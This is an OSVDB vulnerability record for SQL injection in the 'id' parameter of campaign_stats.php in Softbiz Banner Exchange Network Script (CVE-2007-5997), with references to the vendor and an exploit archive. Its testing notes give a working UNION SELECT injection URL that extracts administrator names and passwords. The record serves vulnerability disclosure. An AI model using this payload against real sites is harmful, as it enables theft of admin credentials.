Softbiz Banner Exchange Network Script campaign_stats.php id Variable SQL Injection

2007-11-11T00:00:00
ID OSVDB:39731
Type osvdb
Reporter OSVDB
Modified 2007-11-11T00:00:00

Description

Manual Testing Notes

http://[target]/campaign_stats.php?id=999999%20union//select//0,1,2,3,4,5,6,7,8,admin_name,10,pwd,12,13,14,15//from//sbbanners_admin/*

References:

Vendor URL: http://www.softbizscripts.com/banner-exchange-script-features.php ISS X-Force ID: 38401 Generic Exploit URL: http://www.milw0rm.com/exploits/4619 CVE-2007-5997 Bugtraq ID: 26401